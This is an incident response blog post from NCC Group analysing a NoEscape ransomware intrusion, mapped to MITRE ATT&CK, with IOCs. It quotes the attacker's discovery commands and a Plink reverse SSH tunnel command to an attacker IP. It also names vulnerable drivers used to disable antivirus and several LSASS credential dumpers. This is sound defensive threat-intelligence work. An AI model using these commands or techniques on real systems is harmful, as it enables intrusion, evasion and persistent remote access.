---

Author: Alex Jessop (@ThisIsFineChief)

Summary

Tl;dr

This post will delve into a recent incident response engagement handled by NCC Group’s Cyber Incident Response Team (CIRT) involving the Ransomware-as-a-Service known as NoEscape.

Below provides a summary of findings which are presented in this blog post: 

• Initial access gained via a publicly disclosed vulnerability in an externally facing server
• Use of vulnerable drivers to disable security controls
• Remote Desktop Protocol was used for Lateral Movement
• Access persisted through tunnelling RDP over SSH
• Exfiltration of data via Mega
• Execution of ransomware via scheduled task

NoEscape

NoEscape is a new financially motivated ransomware group delivering a Ransomware-as-a-Service program which was first observed in May 2023 being advertised on a dark web forum, as published by Cyble [1]. It is believed they are a spin-off of the group that used to be known as Avaddon. This post will focus on the Tactics, Techniques and Procedures employed by a threat actor utilising NoEscape Ransomware in a recent Incident Response Engagement.

Review of the NoEscape dark web portal and their list of victims shows no trends in industries targeted which suggests they are opportunistic in nature. To date, 89 victims (18 active) have been posted on the NoEscape portal, with the first being published on 14^th June 2023. Monetary gain is the main objective of this ransomware group. In addition to the usual double extortion method of ransomware and data exfiltration which has been popular in recent years, NoEscape also has a third extortion method: the ability to purchase a DDoS/Spam add on to further impact victims.

Incident Overview

NoEscape appear to target vulnerable external services, with the initial access vector being via the exploitation of a Microsoft Exchange server which was publicly facing in the victim’s environment. Exploitation led to webshells being created on the server and gave the threat actor an initial foothold into the environment.

The threat actor seemed opportunistic in nature, whose objective was monetary gain with a double extortion method of ransomware which included data exfiltration. However, they did appear low skilled due to a kitchen sink approach employed when trying to disable antivirus and dump credentials. Multiple different tools were deployed to enact the same job for the threat actor, which is quite a noisy approach often not observed by the more sophisticated threat actor.

A secondary access method was deployed to ensure continued access in the event that the initial access vector was closed to the threat actor. Data was exfiltrated to a well-known cloud storage provider, however this was interrupted due to premature execution of the ransomware which encrypted files that were being exfiltrated.

Timeline

• T – Initial Access gained via webshell
• T+1 min – Initial recon and credential dumping activity
• T+9 min – Secondary access method established via Plink
• T+18 days – Second phase of credential dumping activity
• T+33 days – Data Exfiltration
•  T+33 days – Ransomware Executed

Mitre TTPs

Initial Access

T1190 – Exploit Public-Facing Application

In keeping with the opportunistic nature, initial access was gained through exploiting the vulnerabilities CVE-2021-34473, CVE-2021-34523 and CVE-2021-31207 which are more commonly known as ProxyShell.

WebShell were uploaded to the victims Microsoft Exchange server and gave the threat actor an initial foothold on the network.

Execution

T1059.001 – Command and Scripting Interpreter: PowerShell

PowerShell was utilised by the threat actor, using the Defender command Set-MpPreference to exclude specific paths from being monitored. This was an attempt to ensure webshells were not detected and remediated by the antivirus.

T1059.003 – Command and Scripting Interpreter: Windows Command Shell

Windows native commands were executed during the discovery phase; targeting domain admin users, antivirus products installed etc.

• net  localgroup administrators
• cmd.exe  /c net group \”REDACTED” /domain
• cmd.exe  /c WMIC /Node:localhost /Namespace:\\\\root\\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List

T1053.005 – Scheduled Task

As has been well documented [2], a Scheduled Task with the name SystemUpdate was used to execute the ransomware.

Persistence 

T1505.003 – Server Software Component: Web Shell

Web Shells provided the threat actor continued access to the estate through the initial access vector.

Privilege Escalation

T1078.002 – Valid Accounts: Domain Accounts

Threat actor gained credentials for valid domain accounts which were used for the majority of lateral movement and execution

T1078.003 – Valid Accounts: Local Accounts

The threat actor was observed enabling the DefaultAccount and utilising this to execute their tools locally on a host.

Defence Evasion

T1562.001 – Impair Defences: Disable or Modify Tools

The threat actor showed their potential lack of experience as multiple different drivers were dropped in an attempt to disable the deployed EDR and AV. Instead of deploying a single driver, multiple drivers and tools were dropped in a ‘throw the kitchen sink at it’ approach.

File	Description
Gmer.exe	GMER is a rootkit detector and remover, utilised by threat actors to identify and kill processes such as antivirus and EDR
aswArPot.sys	An Avast antivirus driver deployed by threat actors to disable antivirus solutions.
mhyprot2.sys	Genshin Impact anti-cheat driver which is utilised by threat actors to kill antivirus processes.

Credential Access

T1003 – Credential Dumping

Similar to the above, multiple credential dumping tools were dropped by the threat actor in an attempt to obtain legitimate credentials.

File	Description
CSDump.exe	Unknown dumping tool (no longer on disk)
Fgdump.exe	A tool for mass password auditing of the Windows systems by dumping credentials from LSASS
MemoryDumper.exe	Creates an encrypted memory dump from LSASS process to facilitate offline cracking of passwords hashes.

Discovery

T1087.001 – Account Discovery: Local Account

A number of inbuilt Windows commands were used to gain an understanding of the local administrators on the group:

net localgroup administrators

net group “REDACTED” /domain

T1018 – Remote System Discovery

Similarly, inbuilt Windows commands were also used to discover information on the network, such as the primary domain controller for the estate:

netdom query /d:REDACTED PDC

Lateral Movement

T1021.001 – Remote Desktop Protocol

Valid domain credentials were obtained through dumping the LSASS process, these accounts were then used to laterally move across the environment via RDP.

Command and Control

T1572 – Protocol Tunnelling

Secondary method of access was deployed by the threat actor, in the event that the initial access vector was closed, by deploying PuTTY link onto multiple hosts in the environment. A SSH tunnel was created to present RDP access to the host from a public IP address owned by the threat actor.

p64.exe [email protected][.]238 -pw REDACTED -P 443 -2 -4 -T -N -C -R 0.0.0.0:10445:127.0.0.1:3389

T1219 – Remote Access Software

The threat actor also utilised software already deployed onto the estate to maintain access, in this scenario obtaining credentials to the TeamViewer deployment.

Exfiltration

T1048.002 – Exfiltration Over Alternative Protocol: Exfiltration Over Asymmetric Encrypted Non-C2 Protocol

As has become common when data is exfiltrated from a victims estate in recent years, the MegaSync.exe utility was used to exfiltrate data from the estate directly to Mega’s cloud storage platform.

Impact

T1486 – Data Encrypted for Impact

The encryptor targeted all files on the C:\ drive except those with the below extension:

bat, bin, cmd, com, cpl, dat, dll, drv, exe, hta, ini, lnk, lock, log, mod, msc, msi, msp, pif, prf, rdp, scr, shs, swp, sys, theme

IOC List

Value	Type	Description
142D950E7DD975056BD3487672C14C26450D55C1	SHA1	Mega Sync
2F366382D2DB32AACA15F9CADC14C693B33C361F	SHA1	Ransomware binary
4709827c7a95012ab970bf651ed5183083366c79	SHA1	Putty Link
75DB5A0B47783B4E4C812CF521C3A443FACB6BBB	SHA1	Ransomware binary
BB3593007FE44993E102830EDC3255836A97FB01	SHA1	Ransomware binary
FB0A150601470195C47B4E8D87FCB3F50292BEB2	SHA1	PsExec
214551A8C07633D8C70F7BE4689EFE3BB74ABFD6E64264CF440100413EA6BE6B	SHA256	Mega Sync
53B5A02259C69AB213BA1458D7F70B01614CC32E040B849AD67FEFB07A725945	SHA256	Ransomware binary
828e81aa16b2851561fff6d3127663ea2d1d68571f06cbd732fdf5672086924d	SHA256	Putty Link
078212DEA0C7FD9CDFA40DBB320B29900F4E8BA0E64D2199F6CAE0BC23D1C625	SHA256	Ransomware binary
2020CAE5115B6980D6423D59492B99E6AAA945A2230B7379C2F8AE3F54E1EFD5	SHA256	Ransomware binary
AD6B98C01EE849874E4B4502C3D7853196F6044240D3271E4AB3FC6E3C08E9A4	SHA256	PsExec
172.93.181[.]238	IP	Malicious IP used for tunnelling via Plink
66.203.125[.]14	IP	Mega IP

MITRE ATT CK® 

Tactic	Technique	ID	Description
Initial Access	Exploit Public-Facing Application	T1190	The vulnerabilities CVE-2021-34473, CVE-2021-34523 and CVE-2021-31207, commonly known as ProxyShell, were exploited
Execution	Command and Scripting Interpreter: PowerShell	T1059.001	PowerShell was utilized to add an exclusion path to the anti-virus to prevent the web shells from being detected
Execution	Command and Scripting Interpreter: Windows Command Shell	T1059.003	Native Windows commands were utilised during the discovery phase of the endpoint and victim estate
Execution	Scheduled Task	T1053.005	A scheduled task was utilised to execute the ransomware binary
Persistence	Server Software Component: Web Shell	T1505.003	Web Shells were uploaded to the Exchange server via exploitation of the ProxyShell vulnerabilities
Privilege Escalation	Valid Accounts: Domain Accounts	T1078.002	Credentials to domain accounts were obtained and utilised for lateral movement
Privilege Escalation	Valid Accounts: Local Accounts	T1078.003	A disabled local account was re-enabled by the threat actor and used.
Defence Evasion	Impair Defenses: Disable or Modify Tools	T1562.001	Tooling was deployed in an attempt to disable the deployed endpoint security controls
Credentials Access	Credential Dumping	T1003	Various different tools were deployed to dump credentials from LSASS
Discovery	Account Discovery: Local Account	T1087.001	‘net’ native Windows command was utilised to discovery users in the domain administrator group
Discovery	Remote System Discovery	T1018	‘netdom’ was utilised to discover the primary domain controller for the victims estate
Lateral Movement	Remote Desktop Protocol	T1021.001	The primary method of lateral movement was RDP
Command and Control	Protocol Tunnelling	T1572	PuTTY link, also known as Plink, was used to tunnel RDP connections over SSH to provide the threat actor with direct access to the Exchange server as back-up to the web shells
Command and Control	Remote Access Software	T1219	Access was gained to the existing TeamViewer deployment and utilised for lateral movement
Exfiltration	Exfiltration Over Alternative Protocol: Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	T1048.002	MegaSync was utilised to exfiltrate data to the cloud storage solution Mega
Impact	Data Encrypted for Impact	T1486	Ransomware was deployed across the estate

References

[1] – Cyble — ‘NoEscape’ Ransomware-as-a-Service (RaaS)

[2] – Meet NoEscape: Avaddon ransomware gang’s likely successor – RedPacket Security

---

Here are some related articles you may find interesting

View articles by category

Call us before you need us.

Our experts will help you.

Get in touch